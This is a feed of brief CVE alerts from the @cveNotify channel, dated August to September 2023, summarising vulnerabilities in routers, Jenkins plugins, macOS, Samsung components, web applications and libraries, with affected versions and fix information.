🚨 CVE-2023-20842In imgsys_cmdq, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07354259; Issue ID: ALPS07340477.🎖@cveNotify |
|
| 2023-09-07 10:58:35 |
🚨 CVE-2022-0900Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NetDataSoft DivvyDrive allows Stored XSS.This issue affects DivvyDrive: from unspecified before v.4.6.2.0.🎖@cveNotify |
|
| 2023-09-07 10:58:31 |
🚨 CVE-2023-39238It is identified a format string vulnerability in ASUS RT-AX56U V2. This vulnerability is caused by lacking validation for a specific value within its set_iperf3_svr.cgi module. An unauthenticated remote attacker can exploit this vulnerability without privilege to perform remote arbitrary code execution, arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-09-07 10:58:30 |
🚨 CVE-2023-39239It is identified a format string vulnerability in ASUS RT-AX56U V2’s General function API. This vulnerability is caused by lacking validation for a specific value within its apply.cgi module. An unauthenticated remote attacker can exploit this vulnerability without privilege to perform remote arbitrary code execution, arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-09-07 10:58:29 |
🚨 CVE-2023-0979Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MedData MedDataPACS allows SQL Injection.This issue affects MedDataPACS : before 2023-03-03.🎖@cveNotify |
|
| 2023-09-07 10:58:28 |
🚨 CVE-2021-43361Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MedData HBYS allows SQL Injection.This issue affects HBYS: from unspecified before 1.1.🎖@cveNotify |
|
| 2023-09-07 10:58:24 |
🚨 CVE-2023-39236ASUS RT-AC86U Traffic Analyzer - Statistic function has insufficient filtering of special character. A remote attacker with regular user privilege can exploit this vulnerability to perform command injection attack to execute arbitrary commands, disrupt system or terminate services.🎖@cveNotify |
|
| 2023-09-07 10:58:23 |
🚨 CVE-2023-38033ASUS RT-AC86U unused Traffic Analyzer legacy Statistic function has insufficient filtering of special character. A remote attacker with regular user privilege can exploit this vulnerability to perform command injection attack to execute arbitrary commands, disrupt system or terminate services.🎖@cveNotify |
|
| 2023-09-07 10:58:19 |
🚨 CVE-2023-4815Missing Authentication for Critical Function in GitHub repository answerdev/answer prior to v1.1.3.🎖@cveNotify |
|
| 2023-09-07 10:58:18 |
🚨 CVE-2023-30533SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected.🎖@cveNotify |
|
| 2023-09-07 10:58:17 |
🚨 CVE-2022-47522The IEEE 802.11 specifications through 802.11ax allow physically proximate attackers to intercept (possibly cleartext) target-destined frames by spoofing a target's MAC address, sending Power Save frames to the access point, and then sending other frames to the access point (such as authentication frames or re-association frames) to remove the target's original security context. This behavior occurs because the specifications do not require an access point to purge its transmit queue before removing a client's pairwise encryption key.🎖@cveNotify |
|
| 2023-09-07 09:58:38 |
🚨 CVE-2023-4772The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'newsletter_form' shortcode in versions up to, and including, 7.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-07 09:58:37 |
🚨 CVE-2023-30079A stack overflow vulnerability exists in function read_file in atlibeconf/lib/getfilecontents.c in libeconf 0.5.1 allows attackers to cause a Denial of service or execute arbitrary code.🎖@cveNotify |
|
| 2023-09-07 09:58:36 |
🚨 CVE-2023-22652A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in openSUSE libeconf leads to DoS via malformed config files.This issue affects libeconf: before 0.5.2.🎖@cveNotify |
|
| 2023-09-07 09:58:35 |
🚨 CVE-2023-38605This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Ventura 13.5. An app may be able to determine a user’s current location.🎖@cveNotify |
|
| 2023-09-07 09:58:31 |
🚨 CVE-2023-40397The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5. A remote attacker may be able to cause arbitrary javascript code execution.🎖@cveNotify |
|
| 2023-09-07 09:58:30 |
🚨 CVE-2023-41329WireMock is a tool for mocking HTTP services. The proxy mode of WireMock, can be protected by the network restrictions configuration, as documented in Preventing proxying to and recording from specific target addresses. These restrictions can be configured using the domain names, and in such a case the configuration is vulnerable to the DNS rebinding attacks. A similar patch was applied in WireMock 3.0.0-beta-15 for the WireMock Webhook Extensions. The root cause of the attack is a defect in the logic which allows for a race condition triggered by a DNS server whose address expires in between the initial validation and the outbound network request that might go to a domain that was supposed to be prohibited. Control over a DNS service is required to exploit this attack, so it has high execution complexity and limited impact. This issue has been addressed in version 2.35.1 of wiremock-jre8 and wiremock-jre8-standalone, version 3.0.3 of wiremock and wiremock-standalone, version 2.6.1 of the python version of wiremock, and versions 2.35.1-1 and 3.0.3-1 of the wiremock/wiremock Docker container. Users are advised to upgrade. Users unable to upgrade should either configure firewall rules to define the list of permitted destinations or to configure WireMock to use IP addresses instead of the domain names.🎖@cveNotify |
|
| 2023-09-07 09:58:29 |
🚨 CVE-2023-4809In pf packet processing with a 'scrub fragment reassemble' rule, a packet containing multiple IPv6 fragment headers would be reassembled, and then immediately processed. That is, a packet with multiple fragment extension headers would not be recognized as the correct ultimate payload. Instead a packet with multiple IPv6 fragment headers would unexpectedly be interpreted as a fragmented packet, rather than as whatever the real payload is.As a result, IPv6 fragments may bypass pf firewall rules written on the assumption all fragments have been reassembled and, as a result, be forwarded or processed by the host.🎖@cveNotify |
|
| 2023-09-07 09:58:25 |
🚨 CVE-2023-23623Electron is a framework which lets you write cross-platform desktop applications using JavaScript, HTML and CSS. A Content-Security-Policy that disables eval, specifically setting a `script-src` directive and _not_ providing `unsafe-eval` in that directive, is not respected in renderers that have sandbox disabled. i.e. `sandbox: false` in the `webPreferences` object. This allows usage of methods like `eval()` and `new Function` unexpectedly which can result in an expanded attack surface. This issue only ever affected the 22 and 23 major versions of Electron and has been fixed in the latest versions of those release lines. Specifically, these versions contain the fixes: 22.0.1 and 23.0.0-alpha.2 We recommend all apps upgrade to the latest stable version of Electron. If upgrading isn't possible, this issue can be addressed without upgrading by enabling `sandbox: true` on all renderers.🎖@cveNotify |
|
| 2023-09-07 09:58:24 |
🚨 CVE-2023-38616A race condition was addressed with improved state handling. This issue is fixed in macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-09-07 09:58:23 |
🚨 CVE-2023-39967WireMock is a tool for mocking HTTP services. When certain request URLs like “@127.0.0.1:1234" are used in WireMock Studio configuration fields, the request might be forwarded to an arbitrary service reachable from WireMock’s instance. There are 3 identified potential attack vectors: via “TestRequester” functionality, webhooks and the proxy mode. As we can control HTTP Method, HTTP Headers, HTTP Data, it allows sending requests with the default level of credentials for the WireMock instance. The vendor has discontinued the affected Wiremock studio product and there will be no fix. Users are advised to find alternatives.🎖@cveNotify |
|
| 2023-09-07 09:58:19 |
🚨 CVE-2023-40392A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.5. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-09-07 09:58:18 |
🚨 CVE-2023-41053Redis is an in-memory database that persists on disk. Redis does not correctly identify keys accessed by `SORT_RO` and as a result may grant users executing this command access to keys that are not explicitly authorized by the ACL configuration. The problem exists in Redis 7.0 or newer and has been fixed in Redis 7.0.13 and 7.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-07 09:58:17 |
🚨 CVE-2023-20263A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. This vulnerability is due to improper input validation of the parameters in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.🎖@cveNotify |
|
| 2023-09-07 00:58:12 |
🚨 CVE-2023-4754Out-of-bounds Write in GitHub repository gpac/gpac prior to 2.3-DEV.🎖@cveNotify |
|
| 2023-09-07 00:58:11 |
🚨 CVE-2023-41642Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.🎖@cveNotify |
|
| 2023-09-06 22:58:54 |
🚨 CVE-2023-41053Redis is an in-memory database that persists on disk. Redis does not correctly identify keys accessed by `SORT_RO` and as a result may grant users executing this command access to keys that are not explicitly authorized by the ACL configuration. The problem exists in Redis 7.0 or newer and has been fixed in Redis 7.0.13 and 7.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-06 22:58:53 |
🚨 CVE-2023-28215A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:52 |
🚨 CVE-2023-28188A denial-of-service issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3. A remote user may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2023-09-06 22:58:51 |
🚨 CVE-2023-28211A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:50 |
🚨 CVE-2023-32426A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-09-06 22:58:46 |
🚨 CVE-2023-28195A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.3. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-09-06 22:58:45 |
🚨 CVE-2023-28214A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:44 |
🚨 CVE-2023-27950An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-09-06 22:58:43 |
🚨 CVE-2023-28209A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:42 |
🚨 CVE-2023-28213A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:38 |
🚨 CVE-2023-28210A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:37 |
🚨 CVE-2023-28212A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:36 |
🚨 CVE-2023-32356A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:35 |
🚨 CVE-2023-32362Error handling was changed to not reveal sensitive information. This issue is fixed in macOS Ventura 13.3. A website may be able to track sensitive user information.🎖@cveNotify |
|
| 2023-09-06 22:58:32 |
🚨 CVE-2023-35359Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-09-06 22:58:31 |
🚨 CVE-2023-28200A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An app may be able to disclose kernel memory.🎖@cveNotify |
|
| 2023-09-06 22:58:30 |
🚨 CVE-2023-29491ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.🎖@cveNotify |
|
| 2023-09-06 22:58:29 |
🚨 CVE-2023-23333There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.🎖@cveNotify |
|
| 2023-09-06 22:58:28 |
🚨 CVE-2022-3970A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt of the file libtiff/tif_getimage.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-06 20:58:19 |
🚨 CVE-2023-20269A vulnerability in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or an authenticated, remote attacker to establish a clientless SSL VPN session with an unauthorized user. This vulnerability is due to improper separation of authentication, authorization, and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features. An attacker could exploit this vulnerability by specifying a default connection profile/tunnel group while conducting a brute force attack or while establishing a clientless SSL VPN session using valid credentials. A successful exploit could allow the attacker to achieve one or both of the following: Identify valid credentials that could then be used to establish an unauthorized remote access VPN session. Establish a clientless SSL VPN session (only when running Cisco ASA Software Release 9.16 or earlier). Notes: Establishing a client-based remote access VPN tunnel is not possible as these default connection profiles/tunnel groups do not and cannot have an IP address pool configured. This vulnerability does not allow an attacker to bypass authentication. To successfully establish a remote access VPN session, valid credentials are required, including a valid second factor if multi-factor authentication (MFA) is configured. Cisco will release software updates that address this vulnerability. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-09-06 20:58:18 |
🚨 CVE-2023-38485Vulnerabilities exist in the BIOS implementation of Aruba 9200 and 9000 Series Controllers and Gateways that could allow an attacker to execute arbitrary code early in the boot sequence. An attacker could exploit this vulnerability to gain access to and change underlying sensitive information in the affected controller leading to complete system compromise.🎖@cveNotify |
|
| 2023-09-06 20:58:17 |
🚨 CVE-2023-41050AccessControl provides a general security framework for use in Zope. Python's "format" functionality allows someone controlling the format string to "read" objects accessible (recursively) via attribute access and subscription from accessible objects. Those attribute accesses and subscriptions use Python's full blown `getattr` and `getitem`, not the policy restricted `AccessControl` variants `_getattr_` and `_getitem_`. This can lead to critical information disclosure. `AccessControl` already provides a safe variant for `str.format` and denies access to `string.Formatter`. However, `str.format_map` is still unsafe. Affected are all users who allow untrusted users to create `AccessControl` controlled Python code and execute it. A fix has been introduced in versions 4.4, 5.8 and 6.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-06 19:58:25 |
🚨 CVE-2023-0667Due to failure in validating the length provided by an attacker-crafted MSMMS packet, Wireshark version 4.0.5 and prior, in an unusual configuration, is susceptible to a heap-based buffer overflow, and possibly code execution in the context of the process running Wireshark🎖@cveNotify |
|
| 2023-09-06 19:58:24 |
🚨 CVE-2021-36646A Cross Site Scrtpting (XSS) vulnerability in KodExplorer 4.45 allows remote attackers to run arbitrary code via /index.php page.🎖@cveNotify |
|
| 2023-09-06 19:58:23 |
🚨 CVE-2023-4498Tenda N300 Wireless N VDSL2 Modem Router allows unauthenticated access to pages that in turn should be accessible to authenticated users only🎖@cveNotify |
|
| 2023-09-06 19:58:19 |
🚨 CVE-2023-39615** DISPUTED ** Xmlsoft Libxml2 v2.11.0 was discovered to contain an out-of-bounds read via the xmlSAX2StartElement() function at /libxml2/SAX2.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted XML file. NOTE: the vendor's position is that the product does not support the legacy SAX1 interface with custom callbacks; there is a crash even without crafted input.🎖@cveNotify |
|
| 2023-09-06 19:58:18 |
🚨 CVE-2022-34038** DISPUTED ** Etcd v3.5.4 allows remote attackers to cause a denial of service via function PageWriter.write in pagewriter.go. NOTE: the vendor's position is that this is not a vulnerability.🎖@cveNotify |
|
| 2023-09-06 19:58:17 |
🚨 CVE-2020-36131AOM v2.0.1 was discovered to contain a stack buffer overflow via the component stats/rate_hist.c.🎖@cveNotify |
|
| 2023-09-06 19:58:13 |
🚨 CVE-2021-30475aom_dsp/noise_model.c in libaom in AOMedia before 2021-03-24 has a buffer overflow.🎖@cveNotify |
|
| 2023-09-06 19:58:12 |
🚨 CVE-2021-30473aom_image.c in libaom in AOMedia before 2021-04-07 frees memory that is not located on the heap.🎖@cveNotify |
|
| 2023-09-06 16:58:35 |
🚨 CVE-2023-41937Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.🎖@cveNotify |
|
| 2023-09-06 16:58:34 |
🚨 CVE-2023-41940Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.🎖@cveNotify |
|
| 2023-09-06 16:58:33 |
🚨 CVE-2023-41945Jenkins Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled, resulting in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.🎖@cveNotify |
|
| 2023-09-06 16:58:32 |
🚨 CVE-2023-41941A missing permission check in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-09-06 16:58:31 |
🚨 CVE-2023-41942A cross-site request forgery (CSRF) vulnerability in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers to clear the SQS queue.🎖@cveNotify |
|
| 2023-09-06 16:58:30 |
🚨 CVE-2023-41946A cross-site request forgery (CSRF) vulnerability in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers to connect to Frugal Testing using attacker-specified credentials, and to retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.🎖@cveNotify |
|
| 2023-09-06 16:58:29 |
🚨 CVE-2023-41944Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message, resulting in an HTML injection vulnerability.🎖@cveNotify |
|
| 2023-09-06 16:58:28 |
🚨 CVE-2023-41931Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not property sanitize or escape the timestamp value from history entries when rendering a history entry on the history view, resulting in a stored cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-09-06 16:58:27 |
🚨 CVE-2023-41947A missing permission check in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers with Overall/Read permission to connect to Frugal Testing using attacker-specified credentials.🎖@cveNotify |
|
| 2023-09-06 16:58:26 |
🚨 CVE-2022-46751Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy.This issue affects any version of Apache Ivy prior to 2.5.2.When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used.This can be used to exfiltrate data, access resources only the machine running Ivy has access to or disturb the execution of Ivy in different ways.Starting with Ivy 2.5.2 DTD processing is disabled by default except when parsing Maven POMs where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be be made more lenient via newly introduced system properties where needed.Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs, see the section about "JAXP Properties for External Access restrictions" inside Oracle's "Java API for XML Processing (JAXP) Security Guide".🎖@cveNotify |
|
| 2023-09-06 16:58:24 |
🚨 CVE-2023-1863Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eskom Water Metering Software allows Command Line Execution through SQL Injection.This issue affects Water Metering Software: before 23.04.06.🎖@cveNotify |
|
| 2023-09-06 16:58:23 |
🚨 CVE-2023-1114Missing Authorization vulnerability in Eskom e-Belediye allows Information Elicitation.This issue affects e-Belediye: from 1.0.0.95 before 1.0.0.100.🎖@cveNotify |
|
| 2023-09-06 16:58:22 |
🚨 CVE-2023-41739Uncontrolled resource consumption vulnerability in File Functionality in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote authenticated users to conduct denial-of-service attacks via unspecified vectors.🎖@cveNotify |
|
| 2023-09-06 16:58:21 |
🚨 CVE-2023-40182Silverware Games is a premium social network where people can play games online. When using the Recovery form, a noticeably different amount of time passes depending of whether the specified email address presents in our database or not. This has been fixed in version 1.3.7.🎖@cveNotify |
|
| 2023-09-06 16:58:20 |
🚨 CVE-2023-41738Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Directory Domain Functionality in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote authenticated users to execute arbitrary commands via unspecified vectors.🎖@cveNotify |
|
| 2023-09-06 16:58:16 |
🚨 CVE-2023-36811borgbackup is an opensource, deduplicating archiver with compression and authenticated encryption. A flaw in the cryptographic authentication scheme in borgbackup allowed an attacker to fake archives and potentially indirectly cause backup data loss in the repository. The attack requires an attacker to be able to: 1. insert files (with no additional headers) into backups and 2. gain write access to the repository. This vulnerability does not disclose plaintext to the attacker, nor does it affect the authenticity of existing archives. Creating plausible fake archives may be feasible for empty or small archives, but is unlikely for large archives. The issue has been fixed in borgbackup 1.2.5. Users are advised to upgrade. Additionally to installing the fixed code, users must follow the upgrade procedure as documented in the change log. Data loss after being attacked can be avoided by reviewing the archives (timestamp and contents valid and as expected) after any "borg check --repair" and before "borg prune". There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-06 16:58:15 |
🚨 CVE-2023-39265Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.🎖@cveNotify |
|
| 2023-09-06 16:58:14 |
🚨 CVE-2021-28644Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Path traversal vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-06 16:58:13 |
🚨 CVE-2021-35980Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Path traversal vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-06 16:58:12 |
🚨 CVE-2021-36021Magento versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an Improper input validation vulnerability within the CMS page scheduled update feature. An authenticated attacker with administrative privilege could leverage this vulnerability to achieve remote code execution on the system. 🎖@cveNotify |
|
| 2023-09-06 07:58:32 |
🚨 CVE-2023-30717Sensitive information exposure vulnerability in SVCAgent prior to SMR Sep-2023 Release 1 allows attackers to get unresettable identifiers.🎖@cveNotify |
|
| 2023-09-06 07:58:31 |
🚨 CVE-2023-30720PendingIntent hijacking in LmsAssemblyTrackerCTC prior to SMR Sep-2023 Release 1 allows local attacker to gain arbitrary file access.🎖@cveNotify |
|
| 2023-09-06 07:58:30 |
🚨 CVE-2023-30709Improper access control in Dual Messenger prior to SMR Sep-2023 Release 1 allows local attackers launch activity with system privilege.🎖@cveNotify |
|
| 2023-09-06 07:58:26 |
🚨 CVE-2023-30711Improper authentication in Phone and Messaging Storage SMR SEP-2023 Release 1 allows attacker to insert arbitrary data to the provider.🎖@cveNotify |
|
| 2023-09-06 07:58:25 |
🚨 CVE-2023-30724Improper authentication in GallerySearchProvider of Gallery prior to version 14.5.01.2 allows attacker to access search history.🎖@cveNotify |
|
| 2023-09-06 07:58:24 |
🚨 CVE-2023-30715Improper access control vulnerability in Weather prior to SMR Sep-2023 Release 1 allows attackers to access location information set in Weather without permission.🎖@cveNotify |
|
| 2023-09-06 07:58:20 |
🚨 CVE-2023-30718Improper export of android application components vulnerability in WifiApAutoHotspotEnablingActivity prior to SMR Sep-2023 Release 1 allows local attacker to change a Auto Hotspot setting.🎖@cveNotify |
|
| 2023-09-06 07:58:19 |
🚨 CVE-2023-30719Exposure of Sensitive Information vulnerability in InboundSmsHandler prior to SMR Sep-2023 Release 1 allows local attackers to access certain message data.🎖@cveNotify |
|
| 2023-09-06 07:58:18 |
🚨 CVE-2023-30725Improper authentication in LocalProvier of Gallery prior to version 14.5.01.2 allows attacker to access the data in content provider.🎖@cveNotify |
|
| 2023-09-06 07:58:14 |
🚨 CVE-2020-22524Buffer Overflow vulnerability in FreeImage_Load function in FreeImage Library 3.19.0(r1828) allows attackers to cuase a denial of service via crafted PFM file.🎖@cveNotify |
|
| 2023-09-06 07:58:13 |
🚨 CVE-2020-21427Buffer Overflow vulnerability in function LoadPixelDataRLE8 in PluginBMP.cpp in FreeImage 3.18.0 allows remote attackers to run arbitrary code and cause other impacts via crafted image file.🎖@cveNotify |
|
| 2023-09-06 07:58:12 |
🚨 CVE-2023-28215A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-08-30 00:58:28 |
🚨 CVE-2023-40827An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the loadpluginPath parameter.🎖@cveNotify |
|
| 2023-08-30 00:58:27 |
🚨 CVE-2023-40826An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.🎖@cveNotify |
|
| 2023-08-30 00:58:24 |
🚨 CVE-2023-38971Cross Site Scripting vulnerabiltiy in Badaso v.0.0.1 thru v.2.9.7 allows a remote attacker to execute arbitrary code via a crafted payload to the rack number parameter in the add new rack function.🎖@cveNotify |
|
| 2023-08-30 00:58:23 |
🚨 CVE-2023-41153A Stored Cross-Site Scripting (XSS) vulnerability in the SSH configuration tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via options for the host value while editing the host options.🎖@cveNotify |
|
| 2023-08-30 00:58:22 |
🚨 CVE-2023-4611A use-after-free flaw was found in mm/mempolicy.c in the memory management subsystem in the Linux Kernel. This issue is caused by a race between mbind() and VMA-locked page fault, and may allow a local attacker to crash the system or lead to a kernel information leak.🎖@cveNotify |
|
| 2023-08-30 00:58:18 |
🚨 CVE-2023-39558AudimexEE v15.0 was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities via the Show Kai Data component.🎖@cveNotify |
|
| 2023-08-30 00:58:17 |
🚨 CVE-2023-41265An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.🎖@cveNotify |
|
| 2023-08-30 00:58:16 |
🚨 CVE-2023-41266A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.🎖@cveNotify |
|
| 2023-08-29 22:58:39 |
🚨 CVE-2023-4548A vulnerability classified as critical has been found in SPA-Cart eCommerce CMS 1.9.0.3. This affects an unknown part of the file /search of the component GET Parameter Handler. The manipulation of the argument filter[brandid] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-238059.🎖@cveNotify |
|
| 2023-08-29 22:58:38 |
🚨 CVE-2021-3262TripSpark VEO Transportation-2.2.x-XP_BB-20201123-184084 NovusEDU-2.2.x-XP_BB-20201123-184084 allows unsafe data inputs in POST body parameters from end users without sanitizing using server-side logic. It was possible to inject custom SQL commands into the "Student Busing Information" search queries.🎖@cveNotify |
|
| 2023-08-29 22:58:37 |
🚨 CVE-2023-39266A vulnerability in the ArubaOS-Switch web management interface could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface provided certain configuration options are present. A successful exploit could allow an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.🎖@cveNotify |
|
| 2023-08-29 22:58:36 |
🚨 CVE-2023-39267An authenticated remote code execution vulnerability exists in the command line interface in ArubaOS-Switch. Successful exploitation results in a Denial-of-Service (DoS) condition in the switch.🎖@cveNotify |
|
| 2023-08-29 22:58:35 |
🚨 CVE-2023-39268A memory corruption vulnerability in ArubaOS-Switch could lead to unauthenticated remote code execution by receiving specially crafted packets. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-08-29 22:58:31 |
